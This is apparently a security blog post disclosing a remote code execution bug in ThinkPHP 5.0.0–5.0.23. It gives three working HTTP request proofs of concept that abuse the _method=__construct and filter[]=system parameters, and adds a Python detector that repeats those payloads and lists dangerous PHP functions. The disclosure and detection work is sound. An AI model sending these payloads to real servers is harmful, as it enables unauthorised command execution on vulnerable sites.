Today ThinkPHP officially released version 5.0.24, yet again, containing a security update for a bug that could lead to getshell. After the remote code execution disclosed on December 9, another remote code execution in ThinkPHP was disclosed tonight; see the official announcement.
Affected versions
ThinkPHP 5.0.0 ~ 5.0.23
PoCs for each version
The PoC for ThinkPHP 5.0.10 is shown below:
POST /think-5.0.10/public/index.php?s=index/index/index HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 53

s=whoami&_method=__construct&method=&filter[]=system
In the latest full 5.0.23 package downloaded from the official site, the module method of the App class (thinkphp/library/think/App.php) gained code that sets the filter parameter value in order to initialize filter. As a result, the filter value set by the request above is overwritten with an empty value, and the request can no longer be exploited.
ThinkPHP 5.0.23 can only be exploited with debug mode enabled; two PoCs are attached:
POST /thinkphp/public/index.php HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 65

_method=__construct&filter[]=system&server[REQUEST_METHOD]=whoami

POST /thinkphp/public/index.php?s=captcha HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 77

_method=__construct&filter[]=system&method=post&server[REQUEST_METHOD]=whoami
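All three PoCs share the same request shape: a POST body that overrides _method with __construct and sets filter[] to a PHP function name, optionally with a server[...] override. The following detection script is an added example (not from the original post) that parses raw HTTP requests and flags that combination; the sample requests are constructed, and the list of function names treated as suspicious is an assumption.

```python
from urllib.parse import parse_qs, urlsplit

# Constructed sample requests (not real traffic), modelled on the PoC shape above.
SAMPLE_REQUESTS = [
    "POST /public/index.php?s=index/index/index HTTP/1.1\r\nHost: 127.0.0.1\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    "s=whoami&_method=__construct&method=&filter[]=system",
    "POST /public/index.php?s=captcha HTTP/1.1\r\nHost: 127.0.0.1\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    "_method=__construct&filter[]=system&method=post&server[REQUEST_METHOD]=whoami",
    # Benign request: a normal _method override (PUT), no filter[] parameter.
    "POST /public/index.php?s=user/login HTTP/1.1\r\nHost: 127.0.0.1\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    "username=alice&password=secret&_method=PUT",
]

# Assumed list of PHP functions that should never appear as a filter value.
SUSPICIOUS_FILTERS = {"system", "exec", "shell_exec", "passthru", "assert", "call_user_func"}


def parse_request(raw):
    """Split a raw HTTP/1.1 request into (method, query dict, body dict)."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line = head.split("\r\n", 1)[0]
    method, target, _version = request_line.split(" ", 2)
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    params = parse_qs(body, keep_blank_values=True)  # keys keep their [] suffix
    return method, query, params


def analyze(raw):
    """Return the ThinkPHP route (s= parameter) and a list of reasons the request looks hostile."""
    _method, query, params = parse_request(raw)
    reasons = []
    if params.get("_method", [""])[0] == "__construct":
        reasons.append("_method override to __construct")
    filters = params.get("filter[]", []) + params.get("filter", [])
    bad = sorted({f for f in filters if f in SUSPICIOUS_FILTERS})
    if bad:
        reasons.append("filter set to " + ", ".join(bad))
    if any(k.startswith("server[") for k in params):
        reasons.append("server[] override in POST body")
    return {"route": query.get("s", [""])[0], "reasons": reasons}


def is_exploit_attempt(raw):
    """High-confidence verdict: constructor override combined with a dangerous filter."""
    reasons = analyze(raw)["reasons"]
    return any(r.startswith("_method override") for r in reasons) and any(
        r.startswith("filter set to") for r in reasons)


if __name__ == "__main__":
    for i, req in enumerate(SAMPLE_REQUESTS):
        print(i, is_exploit_attempt(req), analyze(req))
```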
Reference link for the previous RCE:
https://y4er.com/post/thinkphp5.x-rce-18-12-9/
Original article by Y4er. Reproduction without authorization is prohibited; to reprint, contact the author: Y4er.